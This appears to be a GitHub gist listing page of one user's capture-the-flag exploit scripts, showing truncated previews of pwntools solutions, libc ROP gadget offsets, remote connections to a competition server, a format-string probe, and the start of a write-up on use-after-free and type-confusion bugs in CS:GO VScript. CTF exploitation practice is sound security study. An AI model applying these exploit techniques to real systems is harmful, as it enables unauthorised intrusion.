Bien Pham kungfulon

@kungfulon
kungfulon / exp.c
Created Oct 31, 2021
Hack.lu CTF 2021 Cloudinspect
View exp.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#define INFO "[*] "
kungfulon / ex2.py
Last active Oct 19, 2021
ASCIS 2021 Qualification Round - image_converter
View ex2.py
#!/usr/bin/env python3
import struct
import sys
libc = int(sys.argv[1], 16) - 0x270b3
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
kungfulon / exp.py
Last active Oct 17, 2021
ASCIS 2021 Qualification Round - pwn2win
View exp.py
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
r = remote('125.235.240.166', 33333)
# 1st boss
r.sendline(b'%p')
kungfulon / exp.py
Created Oct 16, 2021
ASCIS 2021 Qualification Round - proxy
View exp.py
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')
MY_IP = b''
r = remote('125.235.240.166', 20120)
kungfulon / csgo.md
Created Sep 6, 2021
ALLES! CTF 2021 - 🔥 Counter Strike: Squirrel Offensive
View csgo.md

🔥 Counter Strike: Squirrel Offensive

This challenge involves an old version of CS:GO VScript, which is vulnerable to a UAF bug and a type confusion bug.

UAF by resizing array in sort compare function

The sort function of squirrel array is array_sort in sqbaselib.cpp, which will call _qsort:

// v: VM, o: array object, func: compare func
kungfulon / ex.py
Created Jan 3, 2021
TetCTF 2020 - cache_v1
View ex.py
#!/usr/bin/env python3
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']
l = ELF('./libc-2.31.so')
kungfulon / secret_keeper.py
Created Nov 28, 2020
ASCIS 2020 Final - Secret Keeper (pwn01)
View secret_keeper.py
#!/usr/bin/env python3
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
context.terminal = ['tmux', 'sp', '-v', '-p', '90']
b = ELF('./secret_keeper')
l = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
kungfulon / stage_1_2.py
Last active Apr 9, 2021
ASCIS 2020 - Pwnable challenges
View stage_1_2.py
#!/usr/bin/env python3
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
b = ELF('./sandboxd')
l = ELF('./libc-2.31.so')
context.terminal = ['tmux', 'sp', '-h', '-p', '80']
View rps.py
#!/usr/bin/env python3
from pwn import *
import ctypes
context.os = 'linux'
context.arch = 'amd64'
LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')
kungfulon / hash.cpp
Created Jun 5, 2020
Simple rolling hash
View hash.cpp
class Hash {
public:
Hash(const std::string &s) : hash1(s.size() + 1), hash2(s.size() + 1) {
if (base == -1) {
base = genBase(minBase, mod);
pow1.push_back(1);
pow2.push_back(1);
}
while (pow1.size() <= s.size()) {